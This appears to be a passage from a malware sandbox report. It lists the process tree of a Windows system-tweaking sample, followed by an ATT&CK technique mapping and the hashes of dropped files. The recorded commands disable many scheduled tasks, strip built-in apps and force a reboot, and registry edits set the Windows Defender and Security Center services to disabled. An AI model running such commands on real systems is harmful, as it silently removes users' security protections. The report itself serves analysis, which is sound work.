"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /DISABLE
2⤵
PID:2712

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /DISABLE
3⤵
PID:2064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /DISABLE
2⤵
PID:3752

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /DISABLE
3⤵
PID:3212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierdaily" /DISABLE
2⤵
PID:2980

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierdaily" /DISABLE
3⤵
PID:4036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierinstall" /DISABLE
2⤵
PID:2244

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierinstall" /DISABLE
3⤵
PID:4976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /DISABLE
2⤵
PID:3588

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /DISABLE
3⤵
PID:1540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /DISABLE
2⤵
PID:1228

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /DISABLE
3⤵
PID:2416

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /DISABLE
2⤵
PID:3556

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /DISABLE
3⤵
PID:1092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Device Information\Device" /DISABLE
2⤵
PID:4536

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Device Information\Device" /DISABLE
3⤵
PID:4428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /DISABLE
2⤵
PID:1568

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /DISABLE
3⤵
PID:4232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /DISABLE
2⤵
PID:1404

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /DISABLE
3⤵
PID:2200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /DISABLE
2⤵
PID:4464

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /DISABLE
3⤵
PID:5032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\International\Synchronize Language Settings" /DISABLE
2⤵
PID:1260

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\International\Synchronize Language Settings" /DISABLE
3⤵
PID:3340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\Installation" /DISABLE
2⤵
PID:4156

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\Installation" /DISABLE
3⤵
PID:2448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources" /DISABLE
2⤵
PID:3424

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources" /DISABLE
3⤵
PID:452

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /DISABLE
2⤵
PID:2760

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /DISABLE
3⤵
PID:3380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /DISABLE
2⤵
PID:1224

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /DISABLE
3⤵
PID:1484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\PushToInstall\Registration" /DISABLE
2⤵
PID:3856

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\PushToInstall\Registration" /DISABLE
3⤵
PID:3528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Setup\SetupCleanupTask" /DISABLE
2⤵
PID:2212

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Setup\SetupCleanupTask" /DISABLE
3⤵
PID:764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /DISABLE
2⤵
PID:64

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /DISABLE
3⤵
PID:5108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsColorSystem\Calibration Loader" /DISABLE
2⤵
PID:448

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsColorSystem\Calibration Loader" /DISABLE
3⤵
PID:3364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /DISABLE
2⤵
PID:2532

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /DISABLE
3⤵
PID:2088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\AppListBackup\Backup" /DISABLE
2⤵
PID:4088

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\AppListBackup\Backup" /DISABLE
3⤵
PID:4652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask" /DISABLE
2⤵
PID:4684

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask" /DISABLE
3⤵
PID:1112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE
2⤵
PID:4864

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE
3⤵
PID:1888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Defrag\ScheduledDefrag" /DISABLE
2⤵
PID:364

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Defrag\ScheduledDefrag" /DISABLE
3⤵
PID:2800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Flighting\FeatureConfig\UsageDataReporting" /DISABLE
2⤵
PID:4184

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Flighting\FeatureConfig\UsageDataReporting" /DISABLE
3⤵
PID:4872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Diagnosis\Scheduled" /DISABLE
2⤵
PID:2272

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Diagnosis\Scheduled" /DISABLE
3⤵
PID:1124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /DISABLE
2⤵
PID:4588

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /DISABLE
3⤵
PID:3384

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /DISABLE
2⤵
PID:2608

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /DISABLE
3⤵
PID:5032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /DISABLE
2⤵
PID:3268

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /DISABLE
3⤵
PID:2392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE
2⤵
PID:3164

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE
3⤵
PID:2196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\MemoryDiagnostic\RunFullMemoryDiagnostic" /DISABLE
2⤵
PID:3280

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\MemoryDiagnostic\RunFullMemoryDiagnostic" /DISABLE
3⤵
PID:704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg -import "C:\Users\Admin\AppData\Roaming\trampios\POWERX.pow" 55555555-5555-5555-5555-555555555555
2⤵
PID:2376

C:\Windows\system32\powercfg.exe
powercfg -import "C:\Users\Admin\AppData\Roaming\trampios\POWERX.pow" 55555555-5555-5555-5555-555555555555
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg -setactive 55555555-5555-5555-5555-555555555555
2⤵
PID:2096

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1484

C:\Windows\system32\powercfg.exe
powercfg -setactive 55555555-5555-5555-5555-555555555555
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow" /ve /t REG_SZ /d "Power Plan" /f
2⤵
PID:5056

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\.pow" /ve /t REG_SZ /d "Power Plan" /f
3⤵
- Modifies registry class
PID:1980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow" /v "FriendlyTypeName" /t REG_SZ /d "Power Plan" /f
2⤵
PID:764

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\.pow" /v "FriendlyTypeName" /t REG_SZ /d "Power Plan" /f
3⤵
- Modifies registry class
PID:3108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow\DefaultIcon" /ve /t REG_EXPAND_SZ /d "%%SystemRoot%%\System32\powercfg.cpl,-202" /f
2⤵
PID:928

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\.pow\DefaultIcon" /ve /t REG_EXPAND_SZ /d "%C:\Windows%\System32\powercfg.cpl,-202" /f
3⤵
- Modifies registry class
PID:2064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow\shell\Import\command" /ve /t REG_SZ /d "powercfg /import \"%1\"" /f
2⤵
PID:2004

C:\Windows\system32\reg.exe
Reg.exe add "HKCR\.pow\shell\Import\command" /ve /t REG_SZ /d "powercfg /import \"%1\"" /f
3⤵
- Modifies registry class
PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftSolitaireCollection*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftOfficeHub*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Office.OneNote*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4196

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Paint3D*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MSPaint*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftStickyNotes*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsAlarms*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsMaps*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.ZuneVideo*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.People*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.BingWeather*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*microsoft.windowscommunicationsapps*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Getstarted*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Microsoft3DViewer*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.GetHelp*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsFeedbackHub*" | Remove-AppxPackage
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im explorer.exe
2⤵
PID:1656

C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start %windir%\explorer.exe
2⤵
PID:1260

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1568

C:\Windows\explorer.exe
C:\Windows\explorer.exe
3⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\System32\shutdown.exe
"C:\Windows\System32\shutdown.exe" -r -t 0
2⤵
PID:3236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
1⤵
- Modifies security service
PID:3900

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 4 /f
1⤵
PID:4324

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:960

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:5032

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4964

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa383a855 /state1:0x41c64e6d
1⤵
PID:3836

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
Filesize
38B

MD5
51a2cbb807f5085530dec18e45cb8569

SHA1
7ad88cd3de5844c7fc269c4500228a630016ab5b

SHA256
1c43a1bda1e458863c46dfae7fb43bfb3e27802169f37320399b1dd799a819ac

SHA512
b643a8fa75eda90c89ab98f79d4d022bb81f1f62f50ed4e5440f487f22d1163671ec3ae73c4742c11830214173ff2935c785018318f4a4cad413ae4eeef985df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
958ec9d245aa0e4bd5d05bbdb37475f4

SHA1
80e6d2c6a85922cb83b9fea874320e9c53740bd9

SHA256
a01df48cd7398ad6894bc40d27fb024dcdda87a3315934e5452a2a3e7dfb371d

SHA512
82567b9f898238e38b3b6b3cdb2565be8cac08788e612564c6ac1545f161cd5c545ba833946cc6f0954f38f066a20c9a4922a09f7d37604c71c8f0e7e46a59ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f79b905987ace17d37befdc1924fe466

SHA1
0f5ed75feba347576f7c74ab77cf771a50e3276b

SHA256
6b789a36e7c6a8764b86d7ba8863b72a798688974784e26497eb210d22c92d4a

SHA512
4aa7e646b2b8155a487b6f7ca60d5dd6319768935347e55c114246a4728fd73c1e6fc32e71ae20a53c0e36d6831cdfe3c7b38e3d4fa61869358e879cebe99ad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6554f33ceb27be07e836bf162228640f

SHA1
0b9341d8f597dbae212ccd4b79682d11ff784a99

SHA256
cb7e1051c62f45c01342ade017e6f6b191ad31b1decf1e203092871db86dfdca

SHA512
917258face5f247e8a832f92a4edc467d8b608993d00c8d0f0107b3d1d5e86ff82c88f596471fc1654e26584253f0ff8d33ee9d31e0f30517a3e64259dfd1401

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
96271b03a5dc39a0fb318456e141c178

SHA1
2cc194272c8c8c8b083a881b1ba1cf5b327bc09b

SHA256
ebcf12f4da766e0779c2b6e8f56d20dcfae2310c79f644db2defd223768bbf8f

SHA512
25d2e006bb1f4fc5440d1bd97b5279b142c34b959dd87ae694f44d8ce466e39e10f24725d1ca002b230329cbb9ed6d77c282521dc47abbef68cf481e8b7a06fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a73ac8ca7b1b2d04f80affa2381b1543

SHA1
05c8cbbf75b38f1c70b5b366e3095602935b2b22

SHA256
8459ac805c677196ec7b7e893f18d7b5e19e964819968b49f8d4fc697c84982d

SHA512
f0ce8511b536dd3339083974dd7d5ad544cff212a2d634d9b2d4275bd6658baa22f8be9233d69ce1a38ec1e9346efd1f7874b40f0ad57a43439da210837581eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
864bdebabb3320a8d750372501cdca67

SHA1
7ce355e0c61d617f5e869ef7530a9669c303be0e

SHA256
d23eba7be8f6ae5bbafb0e842b8beeec65acac317c2fc5142a9168eec93b5e16

SHA512
9ace6f42e8cf45b51eb9e7dd3ae36de82b6ce7ad69d94b6d571681a93428dd77997bde6f24ec1b69f91ea22bde99330805f2a52ec1c6e949e6a415d2ebbb7054

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
22896bc44363f96664a8c9d8845ffd6b

SHA1
34ccd08d8b77069241a2e765d727079fd2d83dd2

SHA256
4fb356685eea59e3213d62b07a1fa4924a9a33706401593ee0ae2d24972f4b44

SHA512
064e6a1ab9a863684489ffd9082c2be85ff6c41b69f42be8216b576d4dddca6323731840bad53836e8c9608a9c28796fcb032e2a9c9648b3cf03b4027f81e67a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4a2f2515b4bb245974ae840a34908b4b

SHA1
12bc354e22a315adfed2797544cdea1998221619

SHA256
305cb9c1ab2887306f13469baf859ef06492bf2d26ca992b0b455f6d9e75ea8f

SHA512
e6eea38aeafb567a2ed896e58300ac690a180751aeb3045e9c63f3c3bf5b0353d964d22dccdbf628f8781bb70261aba271e1d78a05a938cbf6987e0670d75f51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ebb5aa4c0234288a3242d963280c9b02

SHA1
62e02fd681b6a829ff91d465145ac784633010cd

SHA256
449a14be4f110f6ce8006f0a84ef61ce745745c733ccf7e09196bbbfd687d3b7

SHA512
c2cb8a9bc69423d7926e21af1420e008c3ae3780032d938bb27dd2bed7633b6cfc2416ffd38c0ca0292aad7ac3f5efb45c05a1f4a6878adcdabf3901dea36cca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a4dc82de05e2194294b212baba29c853

SHA1
83e946f0b0bae72d047f3c5bb719b79bbdd248f7

SHA256
b080dc4fcbc38d74c89e43686638b8ae31546dbe3c7e5300afa53e4a78458ade

SHA512
02cb1396a13683ed1b67c510061b3c1e6c90245f9b115c75745f15413f094c9793ec95a5ac8f03ad59b55982aa29d88af6f3fedfba2ff23937d0038a665a9596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ff1e45da9561c1d9c8cca2d62e47188b

SHA1
f1cc8b475e9ea62039382605670f546b6a5856c4

SHA256
999148dcd05fec31829021150a9b4711cec5a03f65152b398c8cd196e1780be6

SHA512
fc37448d46a3ef563c2ffff553ff699e18b00d1b797c86b188c67ec0345f086cb1349a5ec18f197fee19ca7a1af1273d3eacb439990bd6e8dec84808209c4834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
30c9e86bc18bb58f1df94fca8fc77b50

SHA1
835ce670a0bb2d6af9cf9b9ce6bda30c6683cf59

SHA256
702cbb0ef89624004d8e59469bec21c021915d051056878a24c63958c826c3fc

SHA512
8a47de483e35508a1b921d94fc6672184a080296eb22b24addb09bd6e55d095062e3b32784979a2dcaac124d3e5c6e5a2761da31b1ffa24349cfa3d9e8603f36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
830cf8c2c969f6d784036d11ae686c2c

SHA1
7280a13cc506e8cf48666d02129ae9937ea3296b

SHA256
9a3278ff55b723483c1ab6034eb5f2dfbf63fea89710a987b6bdbfa174290e7d

SHA512
6aa4beb67e73d5e3fcb55fbae3afdc1e0574bc16842977307a1d37576329e54180e867ed4b4bdf4b56c47cc9e81027e104bd76e375f2a1001bfe3751c213933a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3e111767b9efccf39d268160f1348540

SHA1
d791f0d222642991d008092d18929b57240f0e37

SHA256
000528ee75f1f59b53d295f2d136426be0d32ef344da870bb04d941f14bedd69

SHA512
f80584565a56908882da5c18f557e07a6a5d4406aae6a595c6c4a3360597036b59e09f5bc18ffedf224c677541ab6abf335672258d804fd0e9025e683e07e02a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
783d79ee8d288c6a57a3ce79b6cdeca6

SHA1
4e56588057c74a936492b66d3f44bd1c6942853a

SHA256
